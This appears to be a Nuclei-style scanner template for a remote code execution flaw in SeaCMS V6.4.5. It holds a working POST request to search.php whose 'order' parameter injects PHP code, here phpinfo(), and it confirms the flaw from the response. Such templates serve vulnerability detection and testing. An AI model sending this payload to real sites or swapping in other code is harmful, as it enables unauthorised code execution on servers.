id: seacms-rce info: name: SeaCMS V6.4.5 RCE author: pikpikcu severity: high description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce requests: - method: POST path: - '{{BaseURL}}/search.php?searchtype=5' body: "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}" matchers-condition: and matchers: - type: word words: - "phpinfo" - "PHP Version" condition: and part: body - type: status status: - 200